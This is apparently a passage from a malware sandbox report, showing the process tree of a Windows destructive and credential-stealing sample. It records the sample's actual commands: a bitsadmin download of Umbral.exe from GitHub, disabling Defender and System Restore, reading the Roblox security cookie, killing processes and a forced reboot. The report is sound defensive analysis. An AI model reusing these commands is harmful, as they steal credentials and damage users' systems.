| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\PickerHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14329.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21446.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19074.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004CC
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM GenshinImpact.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26117.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19267.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26847.vbs"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2561.vbs" 19628.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19628.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Users\Admin\AppData\Local\Temp\melter.exe
melter.exe
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
